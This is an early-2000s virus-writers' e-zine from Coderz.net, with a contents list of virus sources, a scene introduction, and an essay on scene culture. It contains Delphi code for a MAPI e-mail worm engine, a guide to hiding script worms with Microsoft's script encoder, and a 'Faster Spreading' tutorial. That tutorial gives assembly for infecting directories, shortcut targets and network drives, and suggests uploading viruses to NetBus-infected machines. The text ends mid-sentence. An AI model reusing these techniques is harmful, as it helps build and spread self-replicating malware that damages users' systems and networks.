Академический Документы
Профессиональный Документы
Культура Документы
Evul's Introduction
Articles
MAPI Worms in C++ and Delphi HomeSlice
Viral Introduction Gigabyte
Script encoding Zulu
Some politically incorrect words about the so-called "scene" Spanska
Faster Spreading SnakeByte
AV-List SnakeByte
Are Anti-Virus Companies Criminals? SnakeByte
Some Tipz & trix for Win2k Ratter
A few ideas for viruses Kalkin/EViL
The protector scene Kalkin/EViL
Katja Kladnik (Lucky Lady) Richard Karsmakers, contributed by Al Leitch
Anti Avp Vbs I-Worms Detection [K]Alamar
Retro the easy way MidNyte
How to become the world's richest man MidNyte
An Introduction to Encryption, Part III MidNyte
Source Code
ASM
Win32.Infinite Billy Belcebu/IKX
W9x.mATRiX Lifewire/IKX
Dildo T-2000/IR
Tequila Disassembled by T-2000/IR
Bad Seed Disassembled by T-2000/IR
Win95.Yildiz Black Jack
CU.1076 Disassembled by Black Jack
Win.Tentacle_II Disassembled by Black Jack
Win32.DDoS SnakeByte
Win32.CrashOverwrite BeLiAL
One Half Disassembled by Ratter
HLL
Win32.HLLP.Scrambler.b Gigabyte
Win32.HLLP.STD Error/Team Necrosis
Win32.HLLW.Hop_Along Quilb
Batch
HighHopes.c Knowdeth/Metaphase & NoMercyVirusTeam
Fuck That 1.0a Deloss/NuKE
Binaries
Tools
E-Z Disassembler & Dumper 1.0 GzR/NuKE
Word97 VBA SR1 Generator ver 1.1k Knowdeth/Metaphase & NoMercyVirusTeam
Humor
Kevin & Kell Bill Holbrook, contributed by SnakeMan
The case of the stupid IRCop Raid
Gigabyte's Introduction
Hey there..
What is this e-zine? Well, it's mainly an oversight of what's been going on in and around the VX scene the last year.
The zine is completely contribution based, as this zine is made by Coderz.net, which isn't a group. I've seen Coderz.net
grow from a fairly small website (being Evul's own homepage) to what it is now: A virus information site, hosting
several (yeah, okay, shitloads) VX homepages. Maybe this is a moment to say, thanks Evul, for the time and effort
you put into Coderz.net.
Thanks also goes to:
Rajaat, Raid and The Unforgiven: For taking the time to answer the interview questions, Rajaat even in real life
(writing the answers down in his hard to read kinda handwriting :)
GriYo, Benny, mort and Ratter: For answering the questions about the meeting.. and for the great time at the meeting
itself of course :)
Roadkil: For HTML help.. and for testing my sunglasses with green and yellow letters on IRC :P
EXE-Gency and Del Armg0: For contributing another interview.
Everyone else who has contributed viruses, articles, etc.: This zine wouldn't be possible without you.
Greets:
Fuck you:
evul@coderz.net
program mapiworm;
uses
Windows, MAPI;
{$R *.RES}
I'm showing the code in Delphi cause it's a bit easier to read
and looks nicer than C++. Code can easily be converted to C in
about thirty minutes, see Microsoft's MSDN section for a complete
MAPI C++ example for the syntax. A ton of code can be snipped before
inserting into your personal worm. I figure showing it in "long form"
to be nice etiquette for an article-specific program.
This code was tested on NT 4.0, but might need a revision dependent
upon your OS and how MAPI is setup. And before you laugh at 20k for
just the worm engine, I checked AVP's site for MAPI and found some
very large filesize worms doing moderately well in the wild:
I-Worm.PrettyPark: http://www.avp.ch/avpve/NewExe/win32/ppark.stm
I-Worm.ZippedFiles: http://www.avp.ch/avpve/worms/zipped.stm
I-Worm.WinExt: http://www.avp.ch/avpve/worms/WINEXT.stm
I-Worm.Plage: http://www.avp.ch/avpve/worms/Plage.stm
ReadMail example
http://support.microsoft.com/support/kb/articles/Q140/3/37.asp
*)
var
MAPIMessage: TMAPIMessage;
lppMapiMessage: PMapiMessage;
Recip, inRecip: TMapiRecipDesc;
msgFile: TMapiFileDesc;
MError: Cardinal;
MapiSession, iMinusOne, i: LongInt;
bWinNT, bFindFirst: Boolean;
ProfileName, sAddress, sProfile, sSentMail: String;
sSeedMessageID, sMessageID: array[0..512] of Char;
os: TOSVersionInfo;
begin
// Which Operating System we on?
os.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
GetVersionEx(os);
bWinNT := (os.dwPlatformId = VER_PLATFORM_WIN32_NT);
// Grab default profilename from registry
if (bWinNT) then
ProfileName := regReadString(HKEY_CURRENT_USER,
'Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles',
'DefaultProfile')
else
// Standard Windows
ProfileName := regReadString(HKEY_CURRENT_USER,
'Software\Microsoft\Windows Messaging Subsystem\Profiles', 'DefaultProfile');
bFindFirst := True;
// Find a message
// MapiFindNext serves as both a "findfirst/findnext" function, dependent
// upon if MessageSeed has a value
MError := MapiFindNext(MapiSession, 0, nil, @sSeedMessageID, 0, 0, @sMessageID);
if (MError = SUCCESS_SUCCESS) then
begin
// Obtain the long pointer
lppMapiMessage := @MAPIMessage;
// Open for Reading, headers only (both faster, and avoids
// writing all the god damned attachments to temp directory)
MError := MAPIReadMail(MAPISession, 0, @sMessageID,
MAPI_ENVELOPE_ONLY, 0, lppMapiMessage);
if (MError = SUCCESS_SUCCESS) and (lppMapiMessage.lpRecips <> nil) then
begin
Before I start, I will explain some words. You will probably not only see these words in Viral Introduction, you might
see them in the rest of the zine as well.
VX: Virus eXchanging. VXers are those who are pro-virus, collect viruses, write them, exchange them..
AV: Anti Virus. They make virus scanners. Examples are: Anti Viral Toolkit Pro, Norton Antivirus, McAfee...
IRC: Internet Relay Chat. People use it to chat, to communicate. There are many different IRC servers, Undernet for
example.
IRC client: What people use to connect to an IRC server. Examples are: mIRC, PIRCH, Xircon, VIRC..
ASM: Assembly language. This language is most used to code viruses in.
TASM: Turbo Assembler. This is most used in the VX scene to assemble ASM source code into executable files.
(Requires TLINK)
VBA: Visual Basic for Applications. It's a part of the Microsoft Office products.
VBS: Visual Basic Scripting language. Can be inside an HTML page. (for more information see the part about script
viruses in "What is:", further down in this document.
Well, I think I should give you some links to virus sites to begin with. Your first stop for finding any VX site should
be coderz.net. Check the "Hosted pages" part, you'll find many interesting sites on coderz.net, and they might contain
other links to VX sites elsewhere.
Coderz.net
29A
#virus Homepage
Virus Trading Center
Tally's Virus Link Reference
If you're looking for IRC channels about viruses, you could come to #vir and #virus on Undernet. Watch out: NEVER
ask or beg for viruses, you'll get kicked out. And DON'T TURN THE CAPS LOCK ON LIKE THIS, it's annoying,
and it looks like you're yelling all the time, or you'll get kicked out. Viruses can be found on the net, if you put in a bit
of effort. If you can’t be bothered, or haven’t got the intelligence to find even a few, then you’re not likely to be helped
out. People in the scene will gladly help you out if you put in the effort first to prove you’re not just going to infect
someone’s computer. They need to know you’re interested in learning.
Mainly in Assembler (ASM), but there are also macro-viruses, which are made in Visual Basic for Applications
(VBA). VBA is a part of the Microsoft Office products. There are viruses that are written in other languages, but
they're a rarity. Newer is VBS, a scripting language that can be used for making worms or viruses.
If you wanna learn how to write viruses, you might want to read a tutorial. There are some tutorials in VDAT, for
example. VDAT contains a lot of information about viruses, VXers, VX groups and also tutorials about how to write
viruses. You can find answers on all kind of virus-related questions in VDAT, you can find some VX history, etc. One
warning about VDAT though: it’s currently nearly 10Mb and can take a long time to download. It is definitely worth it
though. Also, yes it is an exe, yes it is made by someone interested in viruses, but NO, it is not a trojan as I have been
asked before. If you were going to write a trojan, would you make it 10Mb? I guess you’ll have to trust me on that :)
Coderz.net's FTP
Codebreakers
or
Coderz.net's FTP
Don't be discouraged when you start out coding, once you get the hang of the simple parts you can go at your own
pace with the rest.
For which words to search when looking for viruses or information about viruses?
Search for: virus, viruses, virii, VX, computervirus The best search engine to use is http://www.hotbot.com for an
exact match. This can be useful when URL's of virus sites I gave you are down.
You can meet VXers on IRC. Try #vir and #virus on Undernet. Read some tutorials (see "How to learn how to code
viruses?"). Have some patience. You have to get to know the people and they have to get to know you. And learning
how to code viruses might also take some time. If you have questions, first look if you can find the answer in VDAT
before asking. Start with the first tutorial, not with the last. Don't go to the next until you've finished.
Is it illegal?
That depends on the country you live in. Usually writing viruses isn't illegal, exchanging isn't illegal either, but
spreading is. So if you send someone a virus without informing the person that it's a virus, that would be considered
spreading. Always check your country’s laws before doing anything virus-related. Governments don’t generally
understand you can be interested in a virus without needing to spread it, if you have a virus they assume you intend to
spread it.
There can be many reasons: challenge, fame, buck authority, they want to do something different..
What is:
an overwriter: A virus that completly overwrites files to infect them, so it doesn't save the original file. This is what
you start with when you learn to code viruses. The host file is completely destroyed so the virus is noticed almost
immediately. Have a look at Codebreakers magazine #1, or SLAM magazine #2.
an appender: A virus that saves the parts of the infected file that are changed, then writes itself to the end of the host
program. At the end of the virus is some code to restore the program (in memory only) and run it. Because the host
program still works, your virus has a better chance of going un-noticed than an overwriter. This is explained in
Codebreakers magazine #2 or SLAM magazine #3.
a prepender: - A prepending virus will write itself to the start of a program instead of the end. This has the advantage
of not requiring a calculation called the ‘delta offset’. Don’t worry about this yet, the tutorials will explain it when you
get there, I just mention it so you know that there is a difference between a prepender and an appender.
encryption: - Encryption is a way to hide the true function of your virus code, and any messages contained in it. An
encrypted virus has a decyptor at the start that decrypts the rest of it then passes control to the now unencrypted part.
polymorphism: A virus that creates a completely different decryptor every time, to avoid the AV being able to make a
scan-string for the virus.
TSR: - A virus that stays resident in memory. This can be particularly effective, because any program even listed in a
‘DIR’ command can be infected by a TSR virus.
bootsector: - A bootsector is the part of the disk that is read automatically when the computer starts and loads the
operating system. A virus that infects here can load before the operating system, and therefor before any AV program
can be installed in memory.
a macro-virus: Infects MS Office documents, is written in VBA. An example is the Melissa virus.
a script virus: A virus made in Java script or VBS. Those languages can be used inside an HTML page, so the virus
can be inside the HTML page. That's why they're sometimes called HTML viruses. VBS is also called 'Winscript'.
Scripting languages are also good to make worms in. An example is Bubbleboy.
Have patience.. I hope, after you have read Viral Introduction, you've found the information you were looking for,
know where to look for tutorials and virus sites and that you know what the VX scene is.
Good luck,
Gigabyte
Thanks a lot to MidNyte, for all the help with the article and suggestions, and to Spyda for the 'Viral Introduction'
picture.
Script encoding
09/09/2000
Hi all.
First, when reading this, consider that English is not my native language, so expect some mistakes in the text. :)
I was going to submit my last worm for the zine, but well, instead of that I decided to write some things about
encoded scripts (JScript/VBScript) and only use that worm as an example. With this I mean Microsoft's encoding,
not other manual ways of encoding or making your code harder to read.
So this is my first article for a zine, most of my viruses/worms where included in many, but just that, not real articles
or tutorials.
Script encoding started with Internet Explorer 5, in that time it was possible to use the "<script>" tag of HTML files
to write scripts in JavaScript, JScript or VBScript, but this version added new values for the "language" property of
that tag, those values were "JScript.Encode" and "VBScript.Encode".
Examples:
<script language="JScript.Encode">
<script language="VBScript.Encode">
I said that Internet Explorer 5 started this because it included version 5 of both JScript and VBScript, which are the
ones that included this new feature.
For encoding your script you need Script Encoder which is available from http://msdn.microsoft.com/scripting. This
Win32 command line program will read your HTML file with a script tag having "VBScript" as it's "language" value
and it will write a new HTML file with your code encoded and with the "language" attribute changed to
"VBScript.Encode". Similar thing happens when using JScript.
For example, something like this:
<script language="VBScript">
MsgBox "Example"
</script>
<script
language="VBScript.Encode">#@~^GgAAAA==@#@&P~t/TAWXPr36m:2VJ@#@&7gUAAA==^#~@</script>
Have in mind that this encoding is really designed for casual readers of your code, the truth is that it's trivial and will
not protect your code from people that is decided to view it.
Of course that this things are only supported in Internet Explorer, not in other browsers. Script languages are not
part of the HTML language, not even the "language" attribute is part of HTML 4, the correct attribute would be
"type", but well, that is another matter that is not virus related.
At the time of writing this I know only one virus using this feature in HTML files, it is HTML.Lanus which I wrote time
ago. Anyway, I explained script encoding in HTML files to show how it was possible, but as we know, HTML files
are not a real target for viruses since scripting in them needs authorization from the user when using most needed
objects unless we are using some kind of bug to skip the warning message.
Windows Scripting Host 1 (also known as WSH in this text) was included for the first time in Windows 98. It
supported JS (JScript) and VBS (VBScript) files to do scripting, and with this, a new type of viruses was started by
Lord Natas. No encoding was possible.
Time later Windows Scripting Host changed it's name to Windows Script Host and version 2 was out. One of the
things that this new version added was the possibility of encoding our scripts like it was possible with HTML files by
using two new extensions, JSE and VBE.
JSE are JS files after using the encoder, the same happens with VBE and VBS.
For using the encoder with JS and VBS files is the same as with HTML files, it reads a VBS file with our script and it
creates a VBE file which has our encoded script.
NETWORK/OUTLOOK.FakeHoax
NETWORK/OUTLOOK.FakeHoax is an example of script encoding in Windows Script Host. It is the first virus/worm
using the JSE and VBE extension (at least not as auxiliary files), so it has two versions, one in JScript and other in
VBScript.
It uses OUTLOOK and the network shares for spreading. The main code is a COM object written in XML and
VBScript using Windows Script Component, so the code in the JSE and VBE file is trivial. Both versions create a
WSC file (the COM object defined in XML) and then both call methods and change properties of that object, no real
spreading code is in those files.
The worm was written in this way to make it easier to port it to any other language, this way I was able of creating a
JSE and a VBE file without really porting the main code. Also, it's possible to create new versions using Delphi,
Visual C++, or any other by using "REGSVR32.EXE" to register the WSC file as a COM object before calling it's
methods or changing it's properties.
This worm was written to show how JSE and VBE files could be used in viruses/worms, since before this they
where only used as auxiliary files (some versions of HTML.rahC by 1nternal and OUTLOOK.Monopoly by me for
example). Besides, since it needs Windows Script Host 2 or later, it won't be good spreading itself at the time of
writing this.
Also, this was a good opportunity for using Windows Script Component for the first time because it made possible
to write a JScript and a VBScript version without needing to port the whole code, so this is also the first virus/worm
using it's own COM object.
When writing viruses you must know in which systems your code will work. Even that script encoding is not new, it
was not a valid feature for viruses since not many systems supported it. But this is changing in this days and
encoding is now possible for a worm with good spreading capabilities.
Script encoding in HTML files: supported in any system with JScript/VBScript 5+ (included in Internet Explorer 5+).
JSE and VBE files: supported in any system with Windows Script Host 2+ (included in Windows 98 SE, Windows
2000 and Windows Me).
Also, JScript/VBScript 5+ and Windows Script Host 2+ can be installed as separate packages. For example, an
encoded script in a HTML file could be run in Internet Explorer 4 if JScript/VBScript 5+ separate package is
installed.
Trick to run JSE and VBE files in systems with WSH version 1
By using a trick I found, JSE and VBE files can be run in systems with WSH version 1 instead of version 2 if
JScript/VBScript 5+ is installed.
Let's see an example, a system has Windows 98 (not Windows 98 SE) and Internet Explorer 5 installed. WSH 2+
separate package was not installed.
So this system has WSH 1 and JScript/VBScript 5, since WSH 1 was included with that Windows version (unless it
was not selected in a custom installation) and JScript/VBScript 5 was included with Internet Explorer 5.
This system is able to understand encoded scripts, it just doesn't has the JSE and VBE extension support. So to
run a JSE or VBE file we can create a WSH file that calls the encoded script.
This means that instead of running a VBE file directly (not possible in the example), we can run a WSH file (which
is supported in WSH 1) that runs a VBE file.
This method was used in OUTLOOK.Monopoly, the worm was a VBS file that created a WSH and a VBE file and
then runs the WSH file, so the main code was encoded and it worked in the first edition of Windows 98 with Internet
Explorer 5 installed. WSH 2+ was not needed in this worm.
I won't explain how WSH files work, to know more about them, create a JS file and then view it's properties,
changing some of them will create a WSH file in that same directory. Then view it and play with those values. :)
Script encoding can be used in any file format that accepts the "<script>" tag. Anyway some file formats like WSC
and WSF are not supported by the actual version of Script Encoder, but you can include encoding in those file
types by creating the "<script>" tag in a HTML file and then copying the encoded code to the WSC or WSF file.
Script Encoder recognized extensions are ASA, ASP, CDX, HTM, HTML, JS, SCT and VBS.
You can use this feature in HTML viruses/worms even that they are not something very interesting, or you may use
it in worms in JSE or VBE format, which will be better methods.
Normal viruses in JSE and VBE format are not interesting since it would be like JS and VBS viruses, there are not
many files to infect since they are not used much by people, well, maybe you can find lot's of them in my computer
since I'm so crazy about scripting and I use it for lot's of simple tasks, but most users don't use WSH. :)
Also, encoding won't make a file simple to infect, since it would be necessary to decode it, infect it and then encode
it again.
This days there are a lot of worms in VBS files (not happening the same with JScript ones), well, all this worms
could be easily encoded.
Well, that's all, let me know in case of any error you find about technical things or for any question you have.
Bye all.
Zulu
zulu_vx@techie.com
http://coderz.net/zulu
Some politically incorrect words about the so-called "scene"
- Ethnographic introduction
Virus writers and all people classified globally under the "Vx" label are an interesting
population to observe. Especially if you can have a look from the inside, and, at the
same time, if you're not involved enough, in order to be able to see the "scene" from an
independant and exterior point of view. I think i qualify here. I'm around since a few
years, met some coders in real life, wrote some viruses, but at the same time i was never
member of any group, i'm old enough to be able, i hope, to think with some distance,
and these last monthes i basically had better things to do than to write code.
- Don't ask "How much time you spend on IRC?", but ask "Show me your code!"
The main problem of the "scene" can be spelled in three letters: IRC. I'm impressed to
see how people spend so much time chatting about everything except virus coding
techniques. They think that to be a real virus writer, you need to be accepted in some
virus channel, and then spend twelve hours a day there. High dosis of IRC induces a
sort of twist in reality perception, because people behave there very differently from real
life. How many people we saw, and we will see, very proud of their brand new op,
kicking, banning, laughing about infected users, acting as some powerful agressive elite.
Even if they never produced one single line of code. Even if they never did anything
useful for the Vx community. Even if their only production is a twenty line macro-virus.
Even if they have to go to school the day after, where they will not be "DarkLordz" or
"KillerGod" anymore, but normal average teens who have to do their homework. If you
think you're a mature person, and i guess most of us are, behave as a mature person
even on IRC.
You may think i exagerate when i talk about this twist of reality. Unfortunately, i can
cite lots of examples. Let's take one that everybody heard about. This coder, no need to
tell his nickname, according to his own words, sent logs to some anti-virus people
showing that another coder was actively spreading viruses, to "protect one or two
channels from being deleted by Undernet". Basically, that means that the existence of
IRC channels is more important that a real person's life. Because, unfortunately,
nowadays, spreading viruses can lead directly to some years in jail, depending on the
laws in your country. Which means a destroyed life. Just to "save a channel". You see
the twist. I'm pretty sure now the guy in question recognizes the big error he made, and
i hope he learnt from that, but anyway, it's too late.
This example was of course a bit unique in his importance. But it's typical of a state of
mind very widespread in the Vx community. People think an op is the most important
thing in life. They thing their rank level in the channel's bot is the only important thing,
proportional to their eliteness. Twist again. Importantly, this changes the
communication and the behaviour between people. Who is going to criticize the owners
of their favourite channels? Or more generally, people with a higher level? This leads to
hypocrisy, which is very widespread in the community.
I saw too much examples of guys and girls spending so much time on IRC that
everything that happened there, even the most anecdotical fights, was taking a huge
importance. Let me tell you: if you need a computer and to be connected to feel human
emotions like pain, angryness, friendship or love, there is something wrong. Really.
IRC has another problem. It's dangerous. It seems that Vx people never learnt the
lessons from the Melissa case. They don't care about encryption, they don't care about
remailers, they don't care what they say on-line can be used to profile or trace
themselves or, even more importantly, some of their friends. They keep megabytes of
sensitive IRC logs and old mails. They just don't care until the worst happens. Virus
writing and spreading is no more a funny game. It's a dangerous criminal activity, and
you have to take this fact in account, especially if you spread your viruses, or have
friends who do that. This is the main revolution in Vx Land these recent years. Now
they are seriously after us. And nobody cares.
- Vxers as crickets
Let's talk about another interesting behaviour in the Vx scene: the flocking in groups.
That's funny how people who repeat so often that they are independant, or think
different, do all their possible to integrate or create some clan with similar people, and
then be proudly tagged as a member of a larger entity known as a Vx group, with its
own set of new rules and laws they have to conform to. Like sheeps. The analogy is not
here just as a cheap provocation. It's a very old animal behaviour. Individuals are weak;
if they flock, they are stronger against all possible ennemies. Or at least they feel
stronger. Crickets are a good example. Whenever they form a very large group, their
behaviour changes completely and they become much more agressive. They are no more
afraid of predators. It's very funny to see the same kind of basical animal regression in
Vx crowds.
Or maybe it's just to get some form of reconnaissance. People with no skill, or people
afraid to learn (because we were all lamers at day zero, we should not forget that) know
that they will never be accepted in the community for their own merits. So they need a
sort of official tag to prove to others and maybe even more to themselves that they are
part of Vx scene. This mark is provided by the membership in some group, which
provide easily and quickly an official entrance ticket into the scene. No need to produce
anything useful, now. You are already inside the community, even by a totally artificial
way.
Here again, examples are numerous. Was it one year ago that a new mainly english-
based group appeared, totally over-hyped, with every newcomer wanting to integrate?
They did nothing, most of their members were just plain unknown, but you couldn't
miss their presence on IRC. Everybody laughed at them, but nobody told them directly
that they were totally ridiculous, for example with their "public relation department"
(more on that later), and other really laughable things. Yet, again, IRC was the main
"scene" participation. Where is the code? I think now this group returned to the dust it
appeared from, but who really cares? I remember too these ridiculous but finally
rewarded ass-licking efforts by a coder (who is a cool and very intelligent guy, but
anyway) to integrate a high-profile group. Once he was at last able to glue this well-
known tag to his nickname, he reached his goal, and just disappeared. He never coded
anything else.
People sometimes tell me: "being member of a group is a good way to motivate". If you
need to be motivated or gently forced to be a vxer, it should be a better idea to spend
your time fishing, or doing something you don't need to be motivated for. Forget for a
moment the question "how to be a vxer" (and basically, if you still don't know the
answer, it's time to return to your stamp collection), but ask yourself the more important
question: why do you want to be a Vxer? For the hype? Because it's cool? Because
people will fear you? Because you want to satisfy your ego? Because your want to
impress your girlfriend or your mom? Because you're looking for on-line friends? Or
just because you are curious, you want to code and learn some new knowledge?
Another strong critic and clear sign of immaturity that comes to mind. Most of the Vxer
are not able to argument with people from the two other sides of the virus triangle: anti-
virus people and infected users. There is a good place for that: alt.comp.virus on Usenet.
A mainly anti-virus group nowadays, unfortunately, with some non-interesting parrots,
but anyway, the only place where you can directly and publically discuss with members
of the anti-virus industry. They have their share of big hypocrisy, ego, closed mind, of
course, but i'm not talking about them right now. These guys, and some of them are
very smart, have a lot of tough arguments to oppose to us. The easy way, used by most
of Vx people, is not to participate in this group, and avoid any kind of discussion. Or
just to pop up here once, insult everybody, and jump back to their hole. What does it
mean? Easy: virus writers are not enough open-minded to quietly discuss with people
opposing them, listen and contradict some opposite argumentation. Or maybe they are
not smart and mature enough to engage in an adult discussion. It is kind of funny
because Vx often ask for people to be open-minded about virus writing activities.
Instead of bashing the largely beloved Nick Fitzgerald on IRC, where he is not, what
about trying to argue against him publically in the newsgroup? Of course, it may be a
bit tougher, due to his rhetorical skills.
Some vx people told me that they don't participate in this forum because it's a mainly
AV group. Think a bit more about this argumentation. It's kind of recursive, a bit like
an infinite loop, to use coding terms. It looks like an auto-realizing prophecy. In other
words, it's plain stupid.
- Ego scene
I could talk more about the grossly over-inflated ego of most of us (me included), but
my hour of reflexion is over. Anyway, just as an example, i always find funny the
dramatic and emphatic farewells from people leaving the "scene", although they
generally never produced anything noticeable, texts apparently always written with
some emotion. If you want to leave, just disappear silently and return to where you
came from, nobody will notice anyway, keep contacts if you want, and don't bother
people with your ridiculous tears in the eyes and other "official" retirement. The day
you decided to become a vxer, you didn't issue a public statement "People, listen to me,
today i officially join the vx scene!". So, do the same when you leave. Every other way
to stop is just a desesperate and childish call for attention, from people who didn't
receive enough of it for their production during their career, an ultimate try to turn
people eyes in their direction for one or two minutes. This impression is even worsened
when the guy gives, as a reason, "there is too much shit in the scene these days", or
something like that. That clearly means that they were not here to code and to learn.
They probably needed to be accepted in whatever community to find some other people
to talk with. What about the Barbie doll collector scene? Now i think about it, the
utimate case of lameness is the guy who declares everywhere that he quits, and is
actually still around. Not even able to follow his own words.
Another example, linked with the group problem. It seems that some people create a
group for the only excitement to become a boss, to be able to recruit people, command
them, and fire them if needed. People always need to find other people even more lame
than them to enhance themselves, it's an eternal law of the human beings. Same
mechanism of false and artificial feeling of power than in IRC. It's "my" group, "my"
board, "my" zine, "my" channel, and there i am the king. More generally, a rigid
hierarchy in a group is a clear signal of lameness. Newcomers, please notice how the
best groups around have no hierarchy at all. Maybe one guy who centralizes the
material for the zine, and that's all. Every attempt to mimick the real world (a company
for example, with different departments) is condamned to be considered as extremely
lame and poorly productive; and i don't even talk about the irony to see newcomers in
the underground trying very quickly to imitate the mechanisms of the normal world.
Didn't you come in the vx world in part because it looked different?
That's why everybody laugh when a group creates this peak of extreme ridiculousness,
a "Public Relation" department. It's clearly a way to admit "we have nothing to say, but
anyway, there is a guy in charge of that". It's a way to show to everybody your
nombrilist and egocentric view of the scene, because you think every journalist around
is going to be interested by your new group, you will be submerged by interview
requests, users will ask you about your viruses, you will do the first page of the New
York Times. In your dreams.
- Delicate conclusion
I sometimes think that the Vx scene is mainly composed by boring IRC teens, who don't
really know what life (i mean the real life) is all about, who are not interested in
learning, but in posing as some elite lordz of Darkness. It may be partially true, or
partially wrong, depends on how you look at it. Anyway, i don't really care. A minority
of people are interesting enough, as human beings, or coders, or both, and that's the
only important thing, at least for me. I don't care about all the microscopic IRC wars,
the anecdotic group fights, the childish agressivity. Maybe that's because i'm a bit old,
but i think i've learned how to filter important things from the background noise. And
not just in Vx world. Try to do the same, you will see, life is easier.
- Epilogue
People involved in the virus community - i don't like the word "scene", this is not a
theater, and there is nobody looking at us, another nombrilist deformation of reality,
even in the terms used - always say that it's worsening with the years passing. More and
more script kiddies and less and less die-hard asm coders who can spend six hours on a
routine just to optimize it by saving two bytes. I don't think it's true. The problem being
that people cannot separate their personal history from the global picture (that's not
limited to the Vx world, of course). If you try to look at it with some distance, you will
see that the vx community looks the same than five or ten years ago. Not in term of
techniques used, of course, but in term of personalities. New people pops in, old people
quit, as an eternal cycle. In these two extreme populations, and in the large group of
active vxers which sits in the middle, the proportion between posers who are just driven
by an ego trip (ph33r M3!), and the really interesting guys who want to discover new
techniques or possibilities, even through a long learning process, yes, this proportion
stays always the same through the years. You have stupid old schoolers and stupid
newbies who think they are Elvis, and you have interesting old schoolers and interesting
newbies who want to learn, always. If you're reading this and you think you are part of
the "scene", just think about in which category you fit best. But be aware that the image
you have of yourself may not be the image that your Vxers colleagues have of you. If
you're not satisfied with it, think about what you can do to change it and maybe to gain
some respect. I'm not talking just about just improving your technical skills. Some
people try to be creative with their limited knowledge (me, for example), other run
websites, publish useful databases, are active collectors, help newcomers by writing
tutorials, code other things than pure viruses, whatever. You can, at last, ameliorate
your behaviour when interacting with other people. In other words: try to be mature.
PS: Post a message in alt.comp.virus if you want to talk about that - I have no mail.
[copyquedalle: steal this text, modify it, sign it with your name, wipe your ass with it, i don't fucking care]
http://kickme.to/Cryptic/
fly.to/alpina
Faster Spreading
or
What to include in your virus to make it spread more effective
by SnakeByte [SnakeByte@kryptocrew.de]
Here we go, please notice that it is illegal to spread viruses, and all
this information is completely theoretical, or for testing purpouses
in a controlled environment.
I just wrote one Windows-Virus so you will see here just few
lines of code.. ( interesting ones I think but maybe not very optimized ;)
Ok, when a virus arrives on a clean system, it will infect some files, sure .. ;)
But if something went bad, we just get some files in the current directory
and the victim deletes it, because he does not like the infected app.. :(
If you are macro coder, you should try to infect as many documents which
support macro as possible ( DOC, CDR, DOT, PPT, XLS.. ).
Same for the assembler coders, there are a lot of file formats which can
be infected in Win32: PE-EXE, SCR (same as PE-EXE), DLL, HLP and VXD.
Maybe you should try to code a hybrid which is able to infect Binaries on
the one hand and macro on the other hand, this will offer you a much higher
chance of finding files for infection. In VDat there is a description for how
to infect most file types. I think adding 200-400 Bytes to your virus and
being able to infect another type is a very good deal. The more files you
infect the more likely you get your virus around.
Ok, now we infect a lot of files, but still all are in the same directory,
so we need to change and parse directory's. What we should infect nearly
always are the windows and the system directory's, cause they include a lot
of files, which are highly used. Use the GetWindowsDirectory and GetSystemDirectory
API's to retrieve their names. Then you should parse directory's to find more
files to infect. Otherwise we would have infected the current, the win and sys
directory, but nothing else, which is not very useful ( how often do you dcc a
friend your calc.exe ? *g* ) There are two ways of directory parsing, the one
is upwards the other downwards. If you travel downwards ( like cd.. in dos), you
would normally not find a lot of files, so traveling upwards is recommended.
This can be simply done with a FindFirstFile / FindNextFile Loop.
The current directory is assumed to be root on one of the drives.
The FindNextFileProc and FindFirstFileProc are procedures that call the
matching API's ( I think you'll also use them several times )
The RandomNR procedure just generates a random number in dx.
************************
ParseFolder:
call InfectCurDir ; infect the current directory
cmp [ebp+InfCounter],0 ; check if we reached the number of files we want to infect
jbe EndParsing ; we infected enoug ? ok, leave !
GetOtherDir:
; first of all we check if this
; is a valid directory
mov eax, dword ptr [ebp+WFD_dwFileAttributes]
and eax, 10h ; if not we get the next
jz NoThisOne ; one
NoThisOne:
; close Find-Handle
mov eax, dword ptr [ebp+FindHandle]
push eax
call dword ptr [ebp+XFindClose]
Folders db '*.',0
************************
The Windows Registry also offers us a lot of information about what files
or directorys we should infect to be sure that our virus gets activated
again and does not sleep inside some never used files. You need to load
an additional DLL in your virus, but i think this is ok. If you can't load
the DLL, just jmp over the registry routines and infect fewer files.
I think you all know what the windows registry is or ? For those who don't:
the registry replaces the old ini files which have been used in older versions
of windows ( 3.1 ). The registry information is stored in the User.dat and
System.dat. To view or change the registry use 'regedit.exe', which is delivered
with every version of windows.
The following API's are neseccairy to access the registry, they are all
inside the ADVAPI32.DLL !
Ok, let's see some source how to get a value from registry :
This little piece of code gets the Startmenue Folder
************************
WeFailed:
ret
************************
Buw what can we use the registry for ? Ok let's see some interesting values :
Here are the paths of all installed apps, what about parsing this key ? ;)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
Shared files ( infect them "two for the price of one" *g* )
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs
Registered Help Files ( if your virus infects them, here you get a whole bunch of )
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Help
Windows uses LNK-Files to create shortcuts for often used files, so you
don't need to copy a 8 MB huge file to your desktop. If you find such
a Link, you should check if it points to a file you are able to infect,
if so.. don't wait and drop your code over it.
Very useful becomes this if you parse the Start-Menue or the desktop *eg*
Here is some example code from my Win32.DDoS how to do this, it does not
work with NT-LNK Files :( There is also an API we can use for this, but I
never figured it out, but I think this is not that much code, so we can
include it.
************************
; first of all, we check for the file
; mark, it is a single 'L' followed by a zero
LNKSearch: ; go on searching
dec esi ; we search until we found the dots or
loop CheckLoop ; searched the entire file ( size in ecx )
; I don't want to create a SEH .. ;)
; if we end here, we did not find the two dots.. :(
NoLNK:
6.) Worming
To make sure you don't stay on a single computer you should try to spread over
networks. One way are IRC-Worms, which sends your virus to other chatting people.
To my mind this is the easiest way to worm around.
Another way is to check all drives and if you have access to a network drive,
infect there some files.
************************
WhatDrive:
push esi
call GetDriveType
cmp eax, DRIVE_REMOTE ; we got a network drive
jne NoNetwork
NoNetwork:
Call GetNextZero ; place esi after the next zero
; ( searching from esi onwards )
cmp byte ptr [esi],0
jne WhatDrive ; if we searched all drives we
; end here, otherwise we check the type
StopThis:
ret
Buffer db 60h dup (?) ; I don't know that many ppl with 20+
; Drives so this buffersize should be
; big enough ;)
************************
Another way is, like the 911-Dialer does, to scan IP ranges when the user
is online for non-pass protected Netbus PC's. If you have access, just upload
your virus ;)
Finally, you can worm with the help of E-Mails, infect a program and send
it with the help of Visual Basic Script or with the MAPI Commands around. This
